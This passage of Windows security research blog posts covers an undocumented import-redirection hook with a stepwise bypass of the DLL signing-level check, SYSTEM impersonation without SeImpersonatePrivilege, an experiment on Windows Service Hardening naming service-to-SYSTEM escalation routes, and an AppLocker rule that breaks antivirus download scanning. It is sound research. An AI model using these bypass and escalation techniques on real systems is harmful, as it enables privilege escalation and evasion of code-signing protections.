        LPSTARTUPINFOW lpStartupInfo,
        LPPROCESS_INFORMATION lpProcessInformation)
    {
        printf("No, I'm not running %ls\n", lpCommandLine);
        return FALSE;
    }


    const REDIRECTION_FUNCTION_DESCRIPTOR RedirectedFunctions[] =
    {
        { "api-ms-win-core-processthreads-l1-1-0.dll", "CreateProcessW"
                      &CreateProcessWForwarder },
    };


    extern "C" __declspec(dllexport) const REDIRECTION_DESCRIPTOR __RedirectionInformation__ =
    {
        CURRENT_IMPORT_REDIRECTION_VERSION,
        ARRAYSIZE(RedirectedFunctions),
        RedirectedFunctions

    };

    I compiled the DLL, added it to a packaged application, added the ImportRedirectionTable Manifest value and tried it out. It worked! This seems a perfect feature for something like Chrome as it’s allows us to use a supported mechanism to hook imported functions without implementing hooks on NtMapViewOfSection and things like that. There are some limitations, it seems to not always redirect imports you think it should. This might be related to the mention in the SO answer that it only redirects imports directly in your applications dependency graph and doesn’t support GetProcAddress. But you could probably live with that,

    However, to be useful in Chrome it obviously has to work outside of a packaged application. One obvious limitation is there doesn’t seem to be a way of specifying this redirection DLL if the application is not packaged. Microsoft could support this using a new Process Thread Attribute, however I’d expect the potential for abuse means they’d not be desperate to do so.

    The initial code doesn’t seem to do any checking for the packaged application state, so at the very least we should be able to set the RedirectionDllName value and create the process manually using NtCreateUserProcess. The problem was when I did the process initialization failed with STATUS_INVALID_IMAGE_HASH. This would indicate a check was made to verify the signing level of the DLL and it failed to load.

    Trying with any Microsoft signed binary instead I got STATUS_PROCEDURE_NOT_FOUND which would imply the DLL loaded but obviously the DLL I picked didn't export __RedirectionInformation__. Trying a final time with a non-Microsoft, but signed binary I got back to STATUS_INVALID_IMAGE_HASH again. It seems that outside of a packaged application we can only use Microsoft signed binaries. That’s a shame, but oh well, it was somewhat inconvenient to use anyway.

    Before I go there are two further undocumented functions (AFAIK) the DLL can export.

    BOOL __ShouldApplyRedirection__(LPWSTR DllName)

    If this function is exported, you can disable redirection for individual DLLs based on the DllName parameter by returning FALSE.

    BOOL __ShouldApplyRedirectionToFunction__(LPWSTR DllName, DWORD Index)

    This function allows you to disable redirection for a specific import on a DLL. Index is the offset into the redirection table for the matched import, so you can disable redirection for certain imports for certain DLLs.

    In conclusion, this is an interesting feature Microsoft added to Windows to support a niche edge case, and then seems to have not officially documented it. Nice! However, it doesn’t look like it’s useful for general purpose import redirection as normal applications require the file to be signed by Microsoft, presumably to prevent this being abused by malicious code. Also there's no trivial way to specify the option using CreateProcess and calling NtCreateUserProcess doesn't correctly initialize things like SxS and CSRSS connections.

    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .
    .

    Now if you’ve bothered to read this far, I might as well admit you can bypass the signature check quite easily. Digging into where the DLL loading fails we find the following code inside LdrpMapDllNtFileName:

    if ((LoadFlags & 0x1000000) && !NtCurrentPeb()->IsPackagedProcess)
    {
      status = LdrpSetModuleSigningLevel(FileHandle, 8);
      if (!NT_SUCCESS(status))
        return status;

    }

    If you look back at the original call to LdrpLoadDll you'll notice that it was passing flag 0x1000000, which presumably means the DLL should be checked against a known signing level. The check is also disabled if the process is in a Packaged Process through a check on the PEB. This is why the load works in a Packaged Application, this check is just disabled. Therefore one way to get around the check would be to just use a Packaged App of some form, but that's not very convenient. You could try setting the flag manually by writing to the PEB, however that can result in the process not working too well afterwards (at least I couldn't get normal applications to run if I set the flag).

    What is LdrpSetModuleSigningLevel actually doing? Perhaps we can just bypass the check?

    NTSTATUS LdrpSetModuleSigningLevel(HANDLE FileHandle, BYTE SigningLevel) {
        DWORD Flags;
        BYTE CurrentLevel;
        NTSTATUS status = NtGetCachedSigningLevel(FileHandle, &Flags, &CurrentLevel);
        if (NT_SUCCESS(status))
            status = NtCompareSigningLevel(CurrentLevel, SigningLevel);
        if (!NT_SUCCESS(status))
            status = NtSetCachedSigningLevel(4, SigningLevel, &FileHandle);
        return status;

    }

    The code is using a the NtGetCachedSigningLevel and NtSetCachedSigningLevel system calls to use the kernel's Code Integrity module to checking the signing level. The signing level must be at least level 8, passing in from the earlier code, which corresponds to the "Microsoft" level. This ties in with everything we know, using a Microsoft signed DLL loads but a signed non-Microsoft one doesn't as it wouldn't be set to the Microsoft signing level.

    The cached signature checks have had multiple flaws before now. For example watch my UMCI presentation from OffensiveCon. In theory everything has been fixed for now, but can we still bypass it?

    The key to the bypass is noting that the process we want to load the DLL into isn't actually running with an elevated signing level, such as Microsoft only DLLs or Protected Process. This means the cached image section in the SECTION_OBJECT_POINTERS structure doesn't have to correspond to the file data on disk. This is effectively the same attack as the one in my blog on Virtual Box (see section "Exploiting Kernel-Mode Image Loading Behavior").

    Therefore the attack we can perform is as follows:

    1. Copy unsigned Import Redirection DLL to a temporary file.
    2. Open the temporary file for RWX access.
    3. Create an image section object for the file then map the section into memory.
    4. Rewrite the file with the contents of a Microsoft signed DLL.
    5. Close the file and section handles, but do not unmap the memory.
    6. Start a process specifying the temporary file as the DLL to load in the RTL_USER_PROCESS_PARAMETERS structure.
    7. Profit?

    Copy of CMD running with the CreateProcess hook installed.

    Of course if you're willing to write data to the new process you could just disable the check, but where's the fun in that :-)

    Don't Use SYSTEM Tokens for Sandboxing (Part 1 of N)

    By: tiraniddo
    30 January 2020 at 06:40
    This is just a quick follow on from my last post on Windows Service Hardening. I'm going to pick up on why you shouldn't use a SYSTEM token for a sandbox token. Specifically I'll describe an unexpected behavior when you mix the SYSTEM user and SeImpersonatePrivilege, or more specifically if you remove SeImpersonatePrivilege.

    As I mentioned in the last post it's possible to configure services with a limited set of privileges. For example you can have a service where you're only granted SeTimeZonePrivilege and every other default privilege is removed. Interestingly you can do this for any service running as SYSTEM. We can check what services are configured without SeImpersonatePrivilege with the following PS.

    PS> Get-RunningService -IncludeNonActive | ? { $_.UserName -eq "LocalSystem" -and $_.RequiredPrivileges.Count -gt 0 -and "SeImpersonatePrivilege" -notin $_.RequiredPrivileges } 

    On my machine that lists 22 services which are super secure and don't have SeImpersonatePrivilege configured. Of course the SYSTEM user is so powerful that surely it doesn't matter whether they have SeImpersonatePrivilege or not. You'd be right but it might surprise you to learn that for the most part SYSTEM doesn't need SeImpersonatePrivilege to impersonate (almost) any user on the computer.

    Let's see a diagram for the checks to determine if you're allowed to impersonate a Token. You might know it if you've seen any of my presentations, or read part 3 of Reading Your Way Around UAC.

    Impersonation FlowChat. Showing that there's an Origin Session Check.

    Actually this diagram isn't exactly like I've shown before I changed one of the boxes. Between the IL check and the User check I've added a box for "Origin Session Check". I've never bothered to put this in before as it didn't seem that important in the grand scheme. In the kernel call SeTokenCanImpersonate the check looks basically like:

    if (proctoken->AuthenticationId == 
        imptoken->OriginatingLogonSession) {
    return STATUS_SUCCESS;
    }

    The check is therefore, if the current Process Token's Authentication ID matches the Impersonation Token's OriginatingLogonSession ID then allow impersonation. Where is OriginatingLogonSession coming from? The value is set when an API such as LogonUser is used, and is set to the Authentication ID of the Token calling the API. This check allows a user to get back a Token and impersonate it even if it's a different user which would normally be blocked by the user check. Now what Token authenticates all new users? SYSTEM does, therefore almost every Token on the system has an OriginatingLogonSession value set to the Authentication ID of the SYSTEM user.

    Not convinced? We can test it from an admin PS shell. First create a SYSTEM PS shell from an Administrator PS shell using:

    PS> Start-Win32ChildProcess powershell

    Now in the SYSTEM PS shell check the current Token's Authentication ID (yes I know Pseduo is a typo ;-)).

    PS> $(Get-NtToken -Pseduo).AuthenticationId

    LowPart HighPart
    ------- --------
        999        0

    Next remove SeImpersonatePrivilege from the Token:

    PS> Remove-NtTokenPrivilege SeImpersonatePrivilege

    Now pick a normal user token, say from Explorer and dump the Origin.

    PS> $p = Get-NtProcess -Name explorer.exe
    PS> $t = Get-NtToken -Process $p -Duplicate
    PS> $t.Origin

    LowPart HighPart
    ------- --------
        999        0

    As we can see the Origin matches the SYSTEM Authentication ID. Now try and impersonate the Token and check what the resultant impersonation level assigned was:

    PS> Invoke-NtToken $t {$(Get-NtToken -Impersonation -Pseduo).ImpersonationLevel}
    Impersonation

    We can see the final line shows the impersonation level as Impersonation. If we'd been blocked impersonating the Token it'd be set to Identification level instead.

    If you think I've made a mistake we can force failure by trying to impersonate a SYSTEM token but at a higher IL. Run the following to duplicate a copy of the current token, reduce IL to High then test the impersonation level.

    PS> $t = Get-NtToken -Duplicate
    PS> Set-NtTokenIntegrityLevel High
    PS> Invoke-NtToken $t {$(Get-NtToken -Impersonation -Pseduo).ImpersonationLevel}
    Identification

    As we can see, the level has been set to Identification. If SeImpersonatePrivilege was being granted we'd have been able to impersonate the higher IL token as the privilege check is before the IL check.

    Is this ever useful? One place it might come in handy is if someone tries to sandbox the SYSTEM user in some way. As long as you meet all the requirements up to the Origin Session Check, especially IL, then you can still impersonate other users even if that's been stripped away. This should work even in AppContainers or Restricted as the check for sandbox tokens happens after the session check.

    The take away from this blog should be:

    • Removing SeImpersonatePrivilege from SYSTEM services is basically pointless.
    • Never try create a sandboxed process which uses SYSTEM as the base token as you can probably circumvent all manner of security checks including impersonation.



    Empirically Assessing Windows Service Hardening

    By: tiraniddo
    2 January 2020 at 02:26
    In the past few years there's been numerous exploits for service to system privilege escalation. Primarily they revolve around the fact that system services typically have impersonation privilege. What this means is given access to a suitable token handle of an administrator (say through the Rotten Potato attack) you can impersonate and elevate from a lower-privileged service account to SYSTEM. The problem for discovers of these attacks is that Microsoft do not consider them something which needs to be fixed with a security bulletin, as having SeImpersonatePrivilege is basically a massive security hole. However MS go and fix them silently making it unclear if they care or not.

    Of course, none of this is really new, Cesar Cerrudo detailed these sorts of service attacks in Token Kidnapping and Token Kidnapping's Revenge. The novel element recently is how to get hold of the access token, for example via negotiating local NTLM authentication. Microsoft seem to have been fighting this fire for almost 10 years and still have not gotten it right. In shades of UAC, a significant security push to make services more isolated and secure has been basically abandoned because (presumably) MS realized it was an indefensible boundary.

    That's not to say there hasn't been interesting service account to SYSTEM bugs which Microsoft have fixed. The most recent example is CVE-2019-1322 which was independently discovered by multiple parties (DonkeysTeamIlias Dimopoulos and Edward Torkington/Phillip Langlois of NCC). To understand the bug you probably should read up one of the write-ups (NCC one here) but the gist is, the Update Orchestrator Service has a service security descriptor which allowed "NT AUTHORITY\SERVICE" full access. It so happens that all system services, including lower-privileged ones have this group and so you could reconfigure the service (which was running as SYSTEM) to point to any other binary giving a direct service to SYSTEM privilege escalation.

    That begs the question, why was CVE-2019-1322 special enough to be fixed and not issues related to impersonation? Perhaps it's because this issue didn't rely on impersonate privileges being present? It is possible to configure services to not have impersonate privilege, so presumably if you could go from a non-impersonate service to an impersonate service that would count as a boundary? Again probably not, for example this bug which abuses the scheduled task service to regain impersonate privilege wouldn't likely be fixed by Microsoft.

    That lack of clarity is why I tweeted to Nate Warfield and ultimately to Matt Miller asking for some advice with respect to the MSRC Security Servicing Guidelines. The result is, even if the service doesn't have impersonate privilege it wouldn't be a defended boundary if all you get is the same user with additional privileges as you can't block yourself from compromising yourself. This is the UAC argument over again, but IMO there's a crucial difference, Windows Service Hardening (WSH) was supposed to fix this problem for us in Vista. Unsurprisingly Cesar Cerrudo also did a presentation about this at the inaugural (maybe?) Infiltrate in 2011.

    The question I had was, is WSH still as broken as it was in 2011? Has anything changed which made WSH finally live up to its goal of making a service compromise not equal to a full system compromise? To determine that I thought I'd run an experiment on Windows 10 1909. I'm only interested in the features which WSH touches which led me to the following hypothesis:

    "Under Windows Service Hardening one service without impersonate privilege can't write to the resources of another service which does have the privilege, even if the same user, preventing full system compromise."

    The hypothesis makes the assumption that if you can write to another service's resources then it's possible to compromise that other service. If that other service has SeImpersonatePrivilege then that inevitably leads to full system compromise. Of course that's not necessarily the case, the resource being written to might be uninteresting, however as a proxy this is sufficient as the goal of WSH is to prevent one service modifying the data of another even though they are the same underlying user.

    WSH Details

    Before going into more depth on the experiment, let's quickly go through the various features of WSH and how they're expressed. If you know all this you can skip to the description of the experiment and the results.

    Limited Service Accounts and Reduced Privilege

    This feature is by far the oldest attempt to harden services, the introduction of the LOCAL SERVICE (LS) and NETWORK SERVICE (NS) accounts. Prior to the accounts introduction there was only two ways of configuring the user for a system service on Windows, either the fully privileged SYSTEM account or creating a local/domain user which has the "Log on as a Service" right. The two accounts where introduced in XP SP2 (I believe) after worms such as Blaster basically got SYSTEM privilege through remotely attacking exposed services. The two service accounts are not administrator accounts which means they shouldn't be able to directly compromise the system. The accounts are very similar on Windows 10 1909, they are both assigned the following groups*:

    BUILTIN\Users
    CONSOLE LOGON
    Everyone
    LOCAL
    NT AUTHORITY\Authenticated Users
    NT AUTHORITY\LogonSessionId_X_Y
    NT AUTHORITY\SERVICE
    NT AUTHORITY\This Organization

    * Technically this isn't 100% accurate, on my machine the LS account has some extra capability groups, but we'll ignore those for this blog post.

    No Administrator group in sight. Each service token gets a unique Logon Session ID SID which will be important later. The service accounts also have a limited set of privileges, as shown below:

    SeAssignPrimaryTokenPrivilege
    SeAuditPrivilege
    SeChangeNotifyPrivilege
    SeCreateGlobalPrivilege
    SeImpersonatePrivilege
    SeIncreaseQuotaPrivilege
    SeIncreaseWorkingSetPrivilege
    SeShutdownPrivilege
    SeSystemTimePrivilege†
    SeTimeZonePrivilege
    SeUndockPrivilege

    † NETWORK SERVICE doesn't have SeSystemTimePrivilege.

    The two privileges I've highlighted, SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege give these accounts effectively full system access when combined with a suitable privileged token. Part of WSH is also giving control over what privileges the service account actually requires. The default is to allow all privileges, however when configuring a service you can specify a list of privileges to restrict the service to. For example the CDPSvc service is configured to only require SeImpersonatePrivilege. Quite why they bother to put this restriction on the service I don't know ¯\_(ツ)_/¯.

    What's the difference between LS and NS? The primary difference is LS has no network credentials, so accessing network resources as that user would only succeed as an anonymous login. NS on the other hand is created with the credentials of the computer account and so can interact with the network for resources allowed by that authentication. This only really matters to domain joined machines, standalone machines would not share the computer account with anyone else.

    Per-Service SID

    The first big addition in WSH was the Per-Service SID. This SID is automatically added to the group list of default groups shown previously by the SCM when creating the service's primary token. The service SID is also added with the SE_GROUP_OWNER flag set and is not mandatory, which means it can be set as the token's default owner when creating new resources and it can disabled. The basic idea is a service can ACL its resources to this SID to prevent other services from accessing them. The use of a service SID is optional, but the majority of default services are configured to use it. An example SID for CDPSvc is as follows:

    S-1-5-80-3433512109-503559027-1389316256-1766580070-2256751264

    The SID is derived by generating a SHA1 hash of the service name and adding that as the SID's RIDs (with an extra 80 at the start to signify it's a service SID). The use of a hash should make it extremely unlikely two services would generate the same SID.

    Of course it's up to the service to actually ACL their resources appropriately. To aid in that the token's default DACL is also configured to the following (for CDPSvc):

    - Type  : Allowed
    - Name  : NT AUTHORITY\SYSTEM
    - Access: Full Access

    - Type  : Allowed
    - Name  : OWNER RIGHTS
    - Access: ReadControl

    - Type  : Allowed
    - Name  : NT SERVICE\CDPSvc
    - Access: Full Access

    The three entries grant SYSTEM and the service SID full access to any resources with this DACL. It then limits the owner of the resource through OWNER RIGHTS to only READ_CONTROL access. This directly prevents one service account accessing the resources of another for write access. Unfortunately the default DACL is only applied when there's no other access control specified, either explicitly at creation time or due to inheritance. 

    One other thing to point out is that Windows still has shared services through the use of SVCHOST. If multiple services are registered in a specific SVCHOST instance then the SCM will create the token with all service SIDs in the group list and default DACL even if a service isn't currently loaded in the host. That has become less of an issue since Windows 1703, as long as you have greater that 3.5GB of RAM services will run in separate SVCHOST instances and all services will be totally separate.

    Write-Restricted Token

    The second big addition to WSH was the concept of Write-Restricted (WR) tokens. Restricted token's have existed since Windows 2000 and are created using the NtFilterToken system call. The basic concept is the token can have a list of additional groups which are consulted when ever an access check is performed. First the access check is run on the default group list, if access would be granted the access check is run again on the restricted SIDs. If the second check is successful then the access check passes, if not access is denied. 

    Restricted tokens are used for sandboxing (such as in Chrome) but are difficult to setup correctly as it blocks all access equally including reading critical files on disk. WR tokens solve the access problem by only blocking write access but leaving read and execute access alone. 

    In order for a service configured as WR to write to a resource the associated security descriptor must contain the required access for one of the following restricted SIDs.

    Everyone
    NT AUTHORITY\LogonSessionId_X_Y
    NT AUTHORITY\WRITE RESTRICTED
    NT SERVICE\SERVICE_NAME

    The WRITE RESTRICTED SID is a special group SID which resources can apply if they expect a service to write to the resource. This SID is also added to the token's groups by the SCM so that it can be used to pass both checks. By combining service SIDs and WR the amount of resources a service can modify should be significantly reduced.

    And the Rest

    There's a few things which are technically part of service hardening which won't really consider for the experiment:

    The main one is additional rules in the firewall to block network services or requests being made from a service. This is arguably more to prevent remote compromise than it is to prevent cross-service attacks. 

    Another is Session 0 Isolation and System Integrity Level. Session 0 Isolation was introduced to prevent Shatter Attacks, by preventing any windows being created by a service on the same desktop as a normal user. System Integrity Level through UIPI then prevents attacks even if the service did create a window on a normal user desktop as it'd be at a much higher IL (even than Administrators). The System IL does admittedly also have a security access check function but it's not that important for cross-service attacks.

    Experiment Procedure

    On to the experiment itself. Based on the hypothesis I presented earlier the goal is to determine if you can write to resources of one service from another service even though they're the same user. To make this testable I decided on the following procedure:

    Step 1: Build an access token for a service which doesn't exist on the system.
    Step 2: Enumerate all resources of a specific type which are owned by the token owner and perform an access check using the token.
    Step 3: Collate the results based on the type of resource and whether write access was granted.

    The reason for choosing to build a token for a non-existent service is it ensures we should only see the resources that could be shared by other services as the same user, not any resources which are actually designed to be accessible by being created by a service. These steps need to be repeated for different access tokens, we'll use the following five:
    • LOCAL SERVICE
    • LOCAL SERVICE, Write Restricted
    • NETWORK SERVICE
    • NETWORK SERVICE, Write Restricted
    • Control
    We'll test both normal service SID and WR versions of the access token to see if it makes much of a difference. One thing to determine is what to use as a control. Ideally the control would be another service account with WSH disabled. However I couldn't find a way to disable WSH entirely to do this test, so instead we need some other control. If our hypothesis holds and WSH is effective we'd expect no resources to be writable, therefore we need to pick a control account where we know this is not true. The easiest is just to use the current logged on user account, it should be able to access almost all its own resources.

    What resources do we want to inspect? The obvious type is Process/Thread resources. Getting write access to either of these in another service is probably a trivial to get full system compromise through impersonate. We'd want to get a bigger picture however, it'd be useful to include Files, Registry keys and Named Kernel Objects. These resources might not directly lead to compromise but it does give us a general idea of the maximum impact. 

    It's worth noting that the hypothesis made a point to specify writing to the resources of a service which has impersonate privilege from one which does not. However this experimental process will only base the analysis on whether the resource is owned by the service user. This is intentional, it'd be too complex to attribute the resource to a specific service in all cases. However an assumption is made that more services running as a specific user have impersonate privilege than do not, therefore in all probability any resource you can write to is probably owned by one of them. We could verify that assumption if we liked, but I'll probably not.

    Finally, a good experiment should be something which can be repeatable and verifiable. To that end I'll provide all the code necessary to perform the steps, written in PowerShell and using my NtObjectManager module. If you want to re-run the experiment you should be able to do so and produce a very similar set of results.

    Experiment Procedure Detail

    On to specific PowerShell steps to perform the experiment. First off you'll need my NtObjectManager module, specifically at least version 1.1.25 as I've added a few extra commands to simplify the process. You will also need to run all the commands as the SYSTEM user, some command will need it (such as getting access tokens) others benefit for the elevated privileges. From an admin command prompt you can create a SYSTEM PowerShell console using the following command:

    Start-Win32ChildProcess -RequiredPrivilege SeTcbPrivilege,SeBackupPrivilege,SeRestorePrivilege,SeDebugPrivilege powershell

    This command will find a SYSTEM process to create the new process from which also has, at a minimum, the specified list of privileges. Due to the way the process is created it'll also have full access to the current desktop so you can spawn GUI applications running at system if you need them.

    The experiment will be run on a VM of Windows 1909 Enterprise updated to December 2019 from a split-token admin user account. This just ensures the minimum amount of configuration changes and additional software is present. Of course there's going to be variability on the number of services running at any one time, there's not a lot which can be done about that. However it's expected that the result should be same even if the individual resources available are not. If you were concerned you could rerun the experiment on multiple different installs of Windows at different times of day and aggregate the results.

    Creating the Access Tokens

    We need to create 5 access tokens for the test. Ideally we'd like to create the four service tokens using the exact method used by the SCM. We could register our unknown service and start the service to steal its token. There is also an undocumented RGetServiceProcessToken SCM RPC method in newer versions of Windows 10. However I think creating a service risks some resources being populated with that service's identity which might not be what we really want. Instead we can use LogonUserExExW which is what the SCM uses, with the LOGON32_LOGON_SERVICE type to create LS and NS tokens. This will work as long as we have SeTcbPrivilege. We'll then just add the appropriate groups, convert to WR,  and remove privileges as necessary. We can get to the LogonUserExExW API using Get-NtToken. I've wrapped up everything into a function Get-ServiceToken, you can see the full function in the final script. Using this function we can create all the tokens we need using the following commands:

    $tokens = @()
    $tokens += Get-ServiceToken LocalService FakeService
    $tokens += Get-ServiceToken LocalService FakeService -WriteRestricted
    $tokens += Get-ServiceToken NetworkService FakeService
    $tokens += Get-ServiceToken NetworkService FakeService -WriteRestricted

    For the control token we'll get the unmodified session access token for the current desktop. Even though we're running as SYSTEM as we're running on the same desktop we can just use the following command:

    $tokens += Get-NtToken -Session -Duplicate

    Random note. When calling LogonUserExExW and requesting a service SID as an additional group the call will fail with access denied. However this only happens if the service SID is the first NT Authority SID in the additional groups list. Putting any other NT Authority SID, including our new logon session SID before the service SID makes it work. Looking at the code in LSASRV (possibly the function LsapCheckVirtualAccountRestriction) it looks like the use of a service SID should be restricted to the first process (based on its PID) that used a service SID which would be the SCM. However if another NT Authority SID is placed first the checking loop sets a boolean flag which prevents the loop checking any more SIDs and so the service SID is ignored. I've no idea if this is a bug or not, however as you need TCB privilege to set the additional groups I don't think it's a security issue.

    Resource Checking and Result Collation

    With the 5 tokens in hand we can progress to assessing accessible resources. The original purpose of my Sandbox Analysis tools was finding accessible resources from a sandbox process, however the same code is capable of finding resources accessible from any access token, including service tokens.

    First as way of example lets run checks for process and threads:

    $ps = Get-AccessibleProcess -Tokens $tokens `
        -CheckMode ProcessOnly -AllowEmptyAccess
    $ts = Get-AccessibleProcess -Tokens $tokens `
        -CheckMode ThreadOnly -AllowEmptyAccess

    We can pass a list of tokens to the checking command, this improves performance as we only do the enumeration of resources for every token group then do the access check. Each generated access result has a TokenId property which indicates the unique ID of the token which was used for the check, this allows us to extract the correct results later. We also specify the AllowEmptyAccess option, which will generate a result even if the access check fails and the token has no access to the resource. This will be useful to allow us to assess what resources are owned by the token's owner SID but we were not granted access.

    Let's do the rest of the resources:

    $os = Get-AccessibleObject \ -Recurse `
        -Tokens $tokens -AllowEmptyAccess
    $fs = Get-AccessibleFile -Win32Path "$env:SystemDrive\" `
        -FormatWin32Path -Recurse -Tokens $tokens -AllowEmptyAccess
    $ks = Get-AccessibleKey \Registry -FormatWin32Path -Recurse `
        -Tokens $tokens -AllowEmptyAccess

    We'll only get the accessible files on the system drive in this case as that'll be the only drive in the VM. Note that Get-AccessibleObject doesn't check ALPC ports, it's not possible to open an ALPC port by name and read its security descriptor. We'll ignore ALPC ports for this experiment, as it's probably worthy of a topic all on its own.

    We now have all the results we need in five variables along with the tokens. If you want to run it yourself the final script is on Github here. It'll take a fair amount of time to run but once it's complete you'll find 5 CSV files in the current directory containing the results for each token.

    Experiment Results

    We now need to do our basic analysis of the results. Let's start with calculating the percentage of writable resources for each token type relative to the total number of resources. From my single experiment run I got the following table:

    TokenWritableWritable (WR)Total
    Control99.83%N/A13171
    Network Service65.00%0.00%300
    Local Service62.89%0.70%574

    As we expected the control token had almost 100% of the owned resources writable by the user.  However for the two service accounts both had over 60% of their owned resources writable when using an unrestricted token. That level is almost completely eliminated when using a WR token, there were no writable resources for NS and only 4 resources writable from LS, which was less than 1%. Those 4 resources were just Events, from a service perspective not very exciting though there were ACL'ed to everyone which is unusual.

    Just based on these numbers alone it would seem that WSH really is a failure when used unrestricted but is probably fine when used in WR mode. It'd be interesting to dig into what types are writable in the unrestricted mode to get a better understanding of where WSH is failing. This is what I've summarized in the following table:

    TypeLS Writable%LS WritableNS Writable%NS Writable
    Directory0.28%10.51%1
    Event1.66%60.51%1
    File74.24%26848.72%95
    Key22.44%8149.23%96
    Mutant0.28%10.51%1
    Process0.28%10.00%0
    Section0.55%20.00%0
    SymbolicLink0.28%10.51%1
    Thread0.00%00.00%0

    The clear winners, if there is such a thing is Files and Registry Keys taking up over 95% of the resources which are writable. Based on what we know about how WSH works this is understandable. The likelihood is any keys/files are getting their security through inheritance from the parent container. This will typically result in at least the owner field being the service account granted WRITE_DAC access, or the inherited DACL will contain an OWNER CREATOR SID which results an explicit access for the service account.

    What is perhaps more interesting is the results for Processes and Threads, neither NS or LS have any writable threads and only LS has a single writable process. This primary reason for the lack of writable threads and processes is due to the default DACL which is used for new processes when an explicit DACL isn't specified. The DACL has a OWNER RIGHTS SID granted only READ_CONTROL access, the result is that even if the owner of the resource is the service account it isn't possible to write to it. The only way to get full access as per the default DACL is by having the specific service SID in your group list.

    Why does LS have one writable process? This I think is probably a "bug" in the Audio Service which creates the AUDIODG process. If we look at the security descriptor of the AUDIODG process we see the following:

    <Owner>
     - Name  : NT AUTHORITY\LOCAL SERVICE

    <DACL>
     - Type  : Allowed
     - Name  : NT SERVICE\Audiosrv
     - Access: Full Access

     - Type  : Allowed
     - Name  : NT AUTHORITY\Authenticated Users
     - Access: QueryLimitedInformation

    The owner is LS which will grant WRITE_DAC access to the resource if nothing else is in the DACL to stop it. However the default DACL's OWNER RIGHTS SID is missing from the DACL, which means this was probably set explicitly by the Audio Service to grant Authenticated Users query access. This results in the access not being correctly restricted from other service accounts. Of course AUDIODG has SeImpersonatePrivilege so if you find yourself inside a LS unrestricted process with no impersonate privilege you can open AUDIODG (if running) for WRITE_DAC, change the DACL to grant full access and get back impersonate privileges.

    If you look at the results one other odd thing you'll notice is that while there are readable threads there are no readable processes, what's going on? If we look at a normal LS service process' security descriptor we see the following:

    <Owner>
     - Name  : NT AUTHORITY\LogonSessionId_0_202349

    <DACL>
     - Type  : Allowed
     - Name  : NT AUTHORITY\LogonSessionId_0_202349
     - Access: Full Access

     - Type  : Allowed
     - Name  : BUILTIN\Administrators
     - Access: QueryInformation|QueryLimitedInformation

    We should be able to see the reason, the owner is not LS, but instead the logon session SID which is unique per-service. This blocks other LS processes from having any access rights by default. Then the DACL only grants full access to the logon session SID, even administrators are apparently not the be trusted (though they can typically just bypass this using SeDebugPrivilege). This security descriptor is almost certainly set explicitly by the SCM when creating the process.

    Is there anything else interesting in writable resources outside of the files and keys? The one interesting result shared between NS and LS is a single writable Object Directory. We can take a look at the results to find out what directories these are, to see if they share any common purpose. The directory paths are \Sessions\0\DosDevices\00000000-000003e4 for NS and \Sessions\0\DosDevices\00000000-000003e5 for LS. These are the service account's DOS Device directory, the default location to start looking up drive mappings. As the accounts can write to their respective directory this gives another angle of attack, you can compromise any service process running as the same used by dropping a mapping for the C: drive and waiting the process to load a DLL. Leaving that angle open seems sloppy, but it's not like there are no alternative routes to compromise another service.

    I think that's the limit of my interest in analysis. I've put my results up on Google Drive here if you want to play around yourself.

    Conclusions

    Even though I've not run the experiment on multiple machines, at different times with different software I think I can conclude that WSH does not provide any meaningful security boundary when used in its default unrestricted mode. Based on the original hypothesis we can clearly write to resources not created by a service and therefore could likely fully compromise the system. The implementation does do a good job of securing process and thread resources which provide trivial elevation routes but that can be easily compromised if there's appropriate processes running (including some COM services). I can fully support this not being something MS would want to defend through issuing bulletins.

    However when used in WR mode WSH is much more comprehensive. I'd argue that as long as a service doesn't have impersonate privilege then it's effectively sandboxed if running in with a WR token. MS already support sandbox escapes as a defended boundary so I'm not sure why WR sandboxes shouldn't also be included as part of that. For example if the trick using the Task Scheduler worked from a WR service I'd see that as circumventing a security boundary, however I don't work in MSRC so I have no influence on what is or is not fixed.

    Of course in an ideal world you wouldn't use shared accounts at all. Versions of Windows since 7 have support for Virtual Service Accounts where the service user is the service SID rather than a standard service account and the SCM even limits the service's IL to High rather than System. Of course by default these accounts still have impersonate privilege, however you could also remove that.

    The Mysterious Case of a Broken Virus Scanner

    By: tiraniddo
    6 December 2019 at 03:08
    On my VM (with a default Windows 10 1909) I used for my series of AppLocker I wanted to test out the new Edge.  I opened the old Edge and tried to download the canary installer, however the download failed, Edge said the installer had a virus and it'd been deleted. How rude! I also tried the download in Chrome on the same machine with the same result, even ruder!

    Downloading Edge Canary in Edge with AppLocker. Shows a bar that the download has been deleted because it's a virus.

    Oddly it worked if I turned off DLL Rule Enforcement, but not when I enabled it again. My immediate thought might be the virus checking was trying to map the executable and somehow it was hitting the DLL verification callback and failing as the file was in my Downloads folder which is not in the default rule set. That seemed pretty unlikely, however clearly something was being blocked from running. Fortunately AppLocker maintains an Audit Log under "Applications and Services Logs -> Microsoft -> Windows -> AppLocker -> EXE and DLL" so we can quickly diagnose the failure.

    Failing DLL load in audit log showing it tried to load %OSDRIVE%\PROGRAMDATA\MICROSOFT\WINDOWS DEFENDER\PLATFORM\4.18.1910.4-0\MPOAV.DLL

    The failing DLL load was for "%OSDRIVE%\PROGRAMDATA\MICROSOFT\WINDOWS DEFENDER\PLATFORM\4.18.1910.4-0\MPOAV.DLL". This makes sense, the default rules only permit %WINDOWS% and %PROGRAMFILES% for normal users, however %OSDRIVE%\ProgramData is not allowed. This is intentional as you don't want to grant access to locations a normal user could write to, so generally allowing all of %ProgramData% would be asking for trouble. [update:20191206] of course this is known about (I'm not suggesting otherwise), AaronLocker should allow this DLL by default.

    I thought it'd at least be interesting to see why it fails and what MPOAV is doing. As the same failure occurred in both Edge (I didn't test IE) and Chrome it was clearly some common API they were calling. As Chrome is open source it made more sense to look there. Tracking down the resource string for the error lead me to this code. The code was using the Attachment Services API. Which is a common interface to verify downloaded files and attachments, apply MOTW and check for viruses.

    When the IAttachmentExecute::Save method is called the file is checked for viruses using the currently registered anti-virus COM object which implements the IOfficeAntiVirus interface. The implementation for that COM class is in MPOAV.DLL, which as we saw is blocked so the COM object creation fails. And a failure to create the object causes the Save method to fail and the Attachment Services code to automatically delete the file so the browser can't even do anything about it such as ask the user. Ultra rude!

